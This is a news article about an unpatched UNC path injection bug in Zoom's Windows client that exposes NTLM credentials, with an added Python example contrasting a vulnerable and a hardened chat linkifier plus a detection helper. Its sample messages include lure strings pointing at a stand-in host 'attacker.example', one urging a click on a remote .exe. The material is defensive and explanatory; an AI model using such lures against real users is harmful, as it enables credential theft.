Zoom has amassed massive popularity at a time when people need a way to stay socially connected. However, Zoom has again found itself facing a privacy allegation.
The Hacker News reported yesterday that the Zoom client for Windows has an unpatched bug that leaves users' Windows login credentials exposed to attackers.
Hacker News Report (Zoom App)
The publication reported that the Zoom client for Windows is vulnerable to 'UNC path injection'. The issue was reported by the security researcher who posts as @_g0dmode.
Through this vulnerability, an attacker could steal your Windows login credentials and could also launch programs on your system.
The attack relies on the SMB relay / credential capture technique. In simple terms, when Windows connects to a remote SMB server to fetch a file, it automatically authenticates with the current user's username and NTLM challenge-response (the NTLMv2 hash). An attacker-controlled SMB server can record that exchange for offline password cracking or relay it to other services. Security researcher Matthew Hickey confirmed the attack.
Zoom is exposed to this because its Windows client supports remote UNC paths (\\server\share\file): any such path received in a personal or group chat message is turned into a clickable hyperlink, so a single click on it makes Windows open an SMB connection to the attacker's server and hand over the victim's credentials.
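The following is an added example, not Zoom's code or anything from The Hacker News report. It shows the two halves of the problem in a simplified chat renderer: a "vulnerable" linkifier that turns any UNC path in a message into a clickable link (the behaviour described above), a hardened one that only linkifies http(s) URLs and leaves UNC text inert, and a small triage helper that a chat-moderation hook or detection rule could use to flag messages carrying UNC paths. The regexes, the `UncPath` class, the hostname `attacker.example` and the sample messages are all assumptions constructed for the example.

```python
"""UNC path injection in chat text: vulnerable vs. hardened linkifier (added example)."""
import html
import re
from dataclasses import dataclass
from typing import Dict, List

# \\host\share\optional\more : two backslashes, a hostname, then at least one path component.
# Assumed pattern; real clients may accept more host forms (IPv6 literals, FQDNs with spaces, etc.).
UNC_RE = re.compile(r'\\\\([A-Za-z0-9._-]+)\\([^\s<>"]+)')
URL_RE = re.compile(r'https?://[^\s<>"]+')
# Suffixes that would make a click launch a program rather than open a document.
EXEC_SUFFIXES = ('.exe', '.bat', '.cmd', '.scr', '.lnk', '.ps1', '.vbs', '.js', '.hta')


@dataclass
class UncPath:
    raw: str    # the full \\host\share\... text as it appeared in the message
    host: str   # the SMB server Windows would authenticate to
    path: str   # everything after the host

    @property
    def launches_program(self) -> bool:
        return self.path.lower().endswith(EXEC_SUFFIXES)


def find_unc_paths(message: str) -> List[UncPath]:
    """Return every UNC path found in a chat message."""
    return [UncPath(m.group(0), m.group(1), m.group(2)) for m in UNC_RE.finditer(message)]


def _anchor(m: "re.Match") -> str:
    return f'<a href="{m.group(0)}">{m.group(0)}</a>'


def linkify_vulnerable(message: str) -> str:
    """Mimics a client that turns URLs *and* UNC paths into clickable links.

    Clicking a UNC link makes Windows open an SMB session to `host` and send the
    user's NTLM challenge-response before any file content is ever shown.
    """
    escaped = html.escape(message, quote=True)
    escaped = URL_RE.sub(_anchor, escaped)
    return UNC_RE.sub(_anchor, escaped)


def linkify_safe(message: str) -> str:
    """Hardened variant: only http(s) URLs become links; UNC text stays inert."""
    escaped = html.escape(message, quote=True)
    return URL_RE.sub(_anchor, escaped)


def triage(message: str) -> Dict[str, object]:
    """Summary a moderation hook or detection rule could act on."""
    paths = find_unc_paths(message)
    return {
        "unc_hosts": sorted({p.host for p in paths}),
        "executable_targets": [p.raw for p in paths if p.launches_program],
        "credential_leak_risk": bool(paths),
    }


if __name__ == "__main__":
    # Constructed sample messages, not captured Zoom traffic.
    samples = [
        r"Slides for today: \\attacker.example\share\deck.pptx and https://zoom.us/j/123",
        r"Run this to fix audio: \\attacker.example\tools\fix.exe",
        "Meeting link only: https://zoom.us/j/123",
    ]
    for msg in samples:
        print("message :", msg)
        print("vuln    :", linkify_vulnerable(msg))
        print("safe    :", linkify_safe(msg))
        print("triage  :", triage(msg))
        print()
```

The hardened renderer does not try to "sanitise" UNC paths by rewriting them; it simply never promotes them to links, which is the behaviour a chat client should have had from the start. The `triage` output is what you would feed into a chat-log detection rule: any message with a non-empty `unc_hosts` list from an external sender is worth alerting on.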
A day after the report was published, Zoom apologized for falling short of privacy and security expectations and released an updated client that patches several recently reported security issues, including UNC path injection.
How Will It Harm You?
This bug allows an attacker to capture Windows authentication data (your username and NTLM hash) from your machine without your knowledge.
The attacker can also use a crafted UNC link to launch a program that is already present on your computer. Google security researcher Tavis Ormandy confirmed this.
Another security researcher, 'pwnsdx' on Twitter, told The Hacker News that attackers could also disguise the malicious link so that the text displayed at the recipient's end differs from the actual target, making the lure more convincing and practical.
What Should You Do?
Zoom was notified of this bug and has since released an update that patches it, so make sure your Windows client is on the latest version. If you cannot update yet, there are two workarounds.
The Hacker News advised using alternative video conferencing software in its report, such as Skype, Microsoft Teams, Google Hangouts, or FaceTime.
Alternatively, use Zoom in a web browser instead of installing the dedicated client on your system; the bug is in the Windows desktop client.
History Of Privacy Issues Of Zoom
The FBI has warned users about "Zoom-bombing" attacks, in which attackers sneak into a meeting and bombard participants with pornographic images or racist comments.
Yesterday, a report confirmed that Zoom does not use end-to-end encryption to protect users' call data, even though its marketing says it does.
Last week, Zoom updated its iOS app, which was reportedly sending users' device data to third parties, including Facebook, without users' knowledge.